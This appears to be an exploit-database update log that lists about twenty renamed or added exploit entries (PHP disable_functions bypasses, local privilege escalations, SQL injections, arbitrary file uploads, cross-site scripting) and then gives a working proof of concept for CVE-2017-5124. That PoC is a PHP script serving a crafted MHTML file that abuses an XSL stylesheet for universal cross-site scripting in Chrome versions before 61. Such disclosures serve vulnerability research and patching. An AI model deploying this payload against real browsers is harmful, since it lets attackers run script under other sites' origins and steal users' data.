
21 changes to exploits/shellcodes

Notepad3 1.0.2.350 - Denial of Service (PoC)
PHP 5.2.3 - Win32std ext. 'safe_mode' / 'disable_functions' Protections Bypass
PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / Disable Functions Bypass
PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass
PHP 5.2.4 ionCube - 'ioncube_read_file' Safe Mode / Disable Functions Bypass
PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass
PHP 5.x COM - Safe Mode / Disable Functions Bypass
VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Root Privilege Escalation
VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Local Privilege Escalation
Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation
Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Privilege Escalation
Libuser - 'roothelper' Privilege Escalation (Metasploit)
Libuser - 'roothelper' Local Privilege Escalation (Metasploit)
Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)
Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit)
Sun Solaris 11.3 AVS - Local Kernel root Exploit
Sun Solaris 11.3 AVS Kernel - Local Privilege Escalation
PHP 5.2.3 imap (Debian Based) - 'imap_open' Disable Functions Bypass
Webkit (Safari) - Universal Cross-site Scripting
Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting
PHP < 5.6.2 - 'Shellshock' 'disable_functions()' Bypass Command Injection
PHP < 5.6.2 - 'Shellshock' Safe Mode / Disable Functions Bypass / Command Injection
PHP 5.5.9 - CGIMode FPM WriteProcMemFile Bypass Disable Function
PHP 5.5.9 - 'zend_executor_globals' 'CGIMode FPM WriteProcMemFile' Disable Functions Bypass / Load Dynamic Library
PHP Imagick 3.3.0 - disable_functions Bypass
Imagick 3.3.0 (PHP 5.4) - Disable Functions Bypass
Precurio Intranet Portal 2.0 - Cross-Site Request Forgery (Add Admin)
PHP-Proxy 5.1.0 - Local File Inclusion
BitZoom 1.0 - 'rollno' SQL Injection
Net-Billetterie 2.9 - 'login' SQL Injection
Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection
EverSync 0.5 - Arbitrary File Download
Meneame English Pligg 5.8 - 'search' SQL Injection
Kordil EDMS 2.2.60rc3 - Arbitrary File Upload
Simple E-Document 1.31 - 'username' SQL Injection
2-Plan Team 1.0.4 - Arbitrary File Upload
PHP Mass Mail 1.0 - Arbitrary File Upload
Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting
<?php
$filename=realpath("PoC.mht");
header( "Content-type: multipart/related");
readfile($filename);
?>




MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="----MultipartBoundary--"
CVE-2017-5124

------MultipartBoundary--
Content-Type: application/xml;

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xml" href="#stylesheet"?>
<!DOCTYPE catalog [
<!ATTLIST xsl:stylesheet
id ID #REQUIRED>
]>
<xsl:stylesheet id="stylesheet" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="*">
<html><iframe style="display:none" src="https://google.com"></iframe></html>
</xsl:template>
</xsl:stylesheet>

------MultipartBoundary--
Content-Type: text/html
Content-Location: https://google.com

<script>alert('Location origin: '+location.origin)</script>
------MultipartBoundary----